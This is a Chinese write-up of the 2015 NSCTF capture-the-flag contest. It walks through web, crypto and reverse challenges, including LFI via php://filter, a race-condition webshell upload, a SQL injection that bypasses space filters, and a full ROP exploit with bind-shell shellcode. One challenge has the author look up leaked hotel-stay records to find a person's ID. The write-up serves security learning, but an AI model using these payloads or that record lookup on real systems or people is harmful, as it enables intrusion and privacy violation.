记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

网络尖刀107团队:NSCTF绿盟西北高校网络安全攻防大赛Writeup

2015-09-30 23:15

大赛简介

NSFOCUS-CTF是由绿盟科技研发中心主办,面向西北高校的网络安全技术攻防大赛,旨在普及网络安全知识,提高网络攻防意识,发现才华横溢的您,给予丰厚奖励以及Offer。

 

网络尖刀107团队也参加了本次比赛,虽然没有打进前十名,但NSCTF作为107团队的“处女赛”,无论是技术上还是团队合作上收获还是颇丰的。但以下是由107团队总结的Writeup,分享给大家。

 

MISC:


 

MISC1

NSCTF1NSCTF2

Flag:NSCTF_nsfocus666

MISC2

NSCTF2-1

 

NSCTF3

一个rar压缩包,winHex取出来另存一个rar

打开发现需要密码,回去看发现下载页

NSCTF4

密码是nsfocus+5位数字,生成字典爆破

NSCTF5

打开压缩包看到flag

NSCTF6

flag{NCTF_R4r_Cr4ck}

MISC3

NSCTF7

Card下载一个文件card,然后上传刷卡,卡里余额是96.4,题目提示是要把卡里的余额变为208

NSCTF8

要改为:

NSCTF9

思路是:(a0zy给的提示)

 NSCTF10

Web:


 

Web1

这题纯属运气,进去后发现没什么有用的信息,直接性ctrl+u查看源代码,也没什么,想看下链接的语言

试了下index.php  原来是从index.php跳到index。Html 嘿嘿

NSCTF11

Web2

你是谁

你从哪里来

你到哪里去

你是来自火星么?

知道是要改referer和xff但是不知道改成什么,最后在站友提示下做出来了

NSCTF12

101.200.73.168是www.nsctf.net  的IP

NSCTF13

得到字符串,base64解密后得flag

flag:{NSCTF_488b7a2dccd02a734165c39ba4517dbc}

Web3

看返回包php版本,在看到post里面存在ver,尝试一下

http://www.nsctf.net:8002/fa81bb665474f11c025b5355582af315/web/03/?key=&ver=5.5.9-1ubuntu4.12

web4

有个password.txt,可以下载下来爆破,但想了一下,应该是个特殊的字符串吧,ctrl+f了下ns,找到两个,Nsf0cuS这个最像,直接提交不行,burp上提交可以,后来才看到,限制了位数,提交了找到一个cookie,base64解码后是个290bca70c7dae93db6644fa00b9d83b9.php

进去是小黑的留言板,

NSCTF14

抓包修改post数据和cookie,

提交了个admin的不行

NSCTF15

试了很多,小黑,xiaohei,Xiaohei…后来想到系统是linux,试到root才出来。

 

Web5

Encode,和前几天做的scaw的一题很类似,直接写个decode

NSCTF16

flag:{NSCTF_b73d5adfb819c64603d7237fa0d52977}

 

web6

Javascript

源文件js里找到这个

eval(unescape(“var%20strKey1%20%3D%20%22JaVa3C41ptIsAGo0DStAff%22%3B%
0Avar%20strKey2%20%3D%20%22CaNUknOWThIsK3y%22%3B%0Avar%20strKey3%20%
3D%20String.fromCharCode%2871%2C%2048%2C%20111%2C%20100%2C%2033%29%
3B%0Aif%20%28uname%20%3D%3D%20%28strKey3%20+%20%28%28%28strKey1.
toLowerCase%28%29%29.substring%280%2C%20strKey1.indexOf%28%220%22%
29%29%20+%20strKey2.substring%282%2C%206%29%29.toUpperCase%28%29%
29.substring%280%2C%2015%29%29%29%20%7B%0A%20%20%20%20var%
20strKey4%20%3D%20%27Java_Scr1pt_Pa4sW0rd_K3y_H3re%27%3B%0A%20%
20%20%20if%20%28upass%20%3D%3D%20%28strKey4.substring%
28strKey4.indexOf%28%271%27%2C%205%
29%2C%20strKey4.length%20-%20strKey4.indexOf%28%27_%27%29%20+%205%
29%29%29%20%7B%0A%20%20%20%20%
20%20%20%20alert%28%27Login%20Success%21%27%29%3B%0A%20%20%20%20%20%
20%20%20document.getElementById%28%27key%27%29.innerHTML%20%3D%
20unescape%28%22%253Cfont%2520color%253D%2522%2523000%2522%
253Ea2V5X0NoM2NrXy50eHQ%3D%253C/font%253E%22%29%3B%0A%20%20%20%20%
7D%20else%20%7B%0A%20%20%20%20%20%20%20%20alert%28%27Password%
20Error%21%27%29%3B%0A%20%20%20%20%7D%0A%7D%20else%20%7B%0A%20%
20%20%20alert%28%27Login%20Failed%21%27%29%3B%0A%7D”))

 

解密整理得:

NSCTF17

截取出来执行

NSCTF18

获得uname和pass

G0od!JAVA3C41PTISAGO
1pt_Pa4sW0rd_K3y_H3re

 

%3Cfont%20color%3D%22%23000%22%3Ea2V5X0NoM2NrXy50eHQ=%3C/font%3E解密整理得:

NSCTF19

NSCTF20

访问得到有一个新链接接Ch3ck_Au7h.php

访问提示username错误。

http://www.nsctf.net:8000/fa81bb665474f11c025b5355582af315/web/06/
Ch3ck_Au7h.php?username= G0od!JAVA3C41PTISAGO&password=1pt_Pa4sW0rd_K3y_H3re还是错误,后来才想到解出来的是uname和pass

http://www.nsctf.net:8000/fa81bb665474f11c025b5355582af315/web/06/
Ch3ck_Au7h.php?un ame=G0od!JAVA3C41PTISAGO&upass=1pt_Pa4sW0rd_K3y_H3r,拿到flag

flag:{NSCTF_d7590edfdf8bcf958ced10cec94273ad}

web7

social engeer

社工本来就不太擅长,是跟着队友提示着搞出来的

NSCTF21

因为没有字典生成工具,手写password,

NSCTF22

NSCTF23

还好没写完就试了一次就有了,Xiaoming09231995

提交得到一个电话号13588342951

自己收藏的社工库查不到任何信息,队友提示了下找开房记录,百度了一个查开房记录的,输入后找到了姓名和身份证

NSCTF24

再一次耍了下中国式密码,没用,输生日没用,输了身份证号就出来了

flag:{NSCTF_3ad65730a8f203a5ab861169e9547f6d}

 

web8

LFI

目测是load file include,但是没多少思路,在一个群里(忘记了是不是官方交流群)看到别人发了这样一个: php://filter

搜了一下,找到这篇文章:http://forum.cnsec.org/thread-94335-1-1.html

NSCTF25-1

这是格式,放在url上不行,直接放输入框中POST过去php://filter/read=convert.base64-encode/resource=index.php,成功了,读到index。Php的源码,bese64解密

NSCTF25

flag:{NSCTF_9bac7a6e289bf89ee0061bd0abdef0ab}

 

web9

不会

Web10

不会

Web11

File Upload

文件上传,是吧,但是传了就删,传了很多次,一台电脑传,一台电脑访问,都赶不到,最后队友告诉我,上传几千次才能成功一次,看来只有写脚本跑了,

经过一番努力,代码出来了!

NSCTF26

还是不行,可能是上传和访问时间间隔还是大了,就在burp上构建了一个虚拟参数爆破,相当于重复一直上传,py脚本就只做一个事,检测访问状态为200,成功了!!!

先上传的一句话,但是上传成功就被删了,后来就想去读index.php,把上传内容改为

NSCTF27

NSCTF28

这样就出来了,感动哭!

Web12

Sqli

测试username= admin%2527+and+1=1+–+和

admin%2527+order+by+1+–+成功但是加union select 1,2 就失败。后来队友提示可以用%a0代替空格,试了下,ok,普通注入,

username=xx%27%a0union%a0select%a01,flag%a0from%a0flag%23获得flag

 

Crypto:


 

Crypto01

神奇的字符串

试了很多,最后先 ASE得到: flag{DISJV_Hej_UdShofjyed}

凯撒移位 {NSCTF_Rot_EnCryption}

 

Crypto02

神奇的图片

Kali下面foremost得到两张图片,另一张图片上

NSCTF29

Crypto03

神秘的图片+10086

 

用Stegsolve打开,发现好几个类似二维码的,都识别不了,自己制作了一个二维码,对比,发现好像颜色反了,取反色识别,果然是

NSCTF30

flag{NSCTF_Qr_C0De}

 

 

Reverse:


 

Reverse-1500分

107团队作出来来忘记提交,谁知那么早就结束来,错失了前十的位置,不过这边还把exp和思路贴一下,仅供大家学习参考。

思路:盲测fuzz -> 分析协议 -> 绕过 dep

附上exp:

#coding: utf-8

from pwn import *

HOST = sys.argv[1]

 

conn = remote(HOST, 2994)

conn.newline = “\r\n”

 

# get header

conn.recv()

 

# get addr

log.info(“try to get the base addr”)

conn.sendline(“STATUS”)

base = int(conn.recv().strip()[-10:], 16)

log.success(“base addr => {}”.format(hex(base)))

 

# first encrypt, to get the table

log.info(“send the first packet, try to get the table”)

conn.sendline(“ENCRYPT \x80\x00” + “A”*0x80)

conn.recv(3)

table_enc = conn.recv(0x80)

table = []

for c in table_enc:

     table.append(ord(c)^ord(‘A’))

log.success(“Table:”)

for c in table:

     print hex(c),

print

 

# second encrypt, exploit!

log.info(“send the second packet, try to exploit it”)

payload = “A” * 512

 

# save esp to eax, ebx

payload += pack(base+0x1001)

payload += pack(base+0x1004)

 

# point ebx to shellcode

payload += pack(base+0x1015)

payload += pack(base+0x1015)

payload += pack(base+0x1015)

payload += pack(base+0x1015)

payload += pack(base+0x1015)

 

# point eax to parameter1

payload += pack(base+0x100e)

payload += pack(base+0x100e)

payload += pack(base+0x100e)

payload += pack(base+0x100e)

payload += pack(base+0x100e)

payload += pack(base+0x3814)

payload += pack(0x4)

payload += pack(base+0x5c0a)

 

# modify parameter 1

payload += pack(base+0x1007)

 

# point eax to ret addr & modify ret

payload += pack(base+0x100a)

payload += pack(base+0x1007)

 

# call VirtualProtect

payload += pack(base+0x101b)

 

payload += “AAAA”

payload += “BBBB”

payload += pack(0x200)

payload += pack(0x40)

payload += pack(0x00010000)

payload += “\x90” * 200

 

# shellcode for bind shell

payload += “\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b”

payload += “\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7”

payload += “\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf”

payload += “\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c”

payload += “\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01”

payload += “\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31”

payload += “\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d”

payload += “\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66”

payload += “\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0”

payload += “\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f”

payload += “\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68”

payload += “\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8”

payload += “\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00”

payload += “\xff\xd5\x6a\x08\x59\x50\xe2\xfd\x40\x50\x40\x50\x68”

payload += “\xea\x0f\xdf\xe0\xff\xd5\x97\x68\x02\x00\x11\x5c\x89”

payload += “\xe6\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x57”

payload += “\x68\xb7\xe9\x38\xff\xff\xd5\x57\x68\x74\xec\x3b\xe1”

payload += “\xff\xd5\x57\x97\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63”

payload += “\x6d\x64\x00\x89\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59”

payload += “\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24”

payload += “\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e\x56”

payload += “\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e”

payload += “\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0”

payload += “\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c”

payload += “\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00”

payload += “\x53\xff\xd5”

 

# xor payload

offset = ”

for i in xrange(len(payload)):

     offset += chr(ord(payload[i])^table[i%128])

conn.sendline(‘ENCRYPT \xf0\x08’+offset)

 

# close the connection

conn.close()

 

# interact

conn = remote(HOST, 4444)

log.success(“enjoy!”)

conn.interactive(prompt=””)

conn.close()

Snip20150930_2

整理编辑:iDer

知识来源: www.ijiandao.com/safe/cto/16082.html

阅读:327718 | 评论:0 | 标签:技术 107 NSCTF WriteUp

想收藏或者和大家分享这篇好文章→复制链接地址

“网络尖刀107团队:NSCTF绿盟西北高校网络安全攻防大赛Writeup”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云